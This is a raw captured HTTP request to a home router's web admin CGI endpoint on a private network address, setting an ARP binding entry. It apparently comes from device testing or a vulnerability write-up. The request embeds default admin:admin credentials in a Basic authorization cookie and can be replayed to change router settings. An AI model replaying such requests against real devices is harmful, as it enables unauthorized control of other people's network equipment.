POST /cgi?3 HTTP/1.1
Host: 192.168.69.4:49153
Content-Length: 93
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Content-Type: text/plain
Accept: */*
Origin: http://192.168.69.4:49153
Referer: http://192.168.69.4:49153/mainFrame.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close

[ARP_BIND_ENTRY#0,0,0,0,0,0#0,0,0,0,0,0]0,3
state=1
ip=-1062717439
mac=00:01:6C:06:A6:29
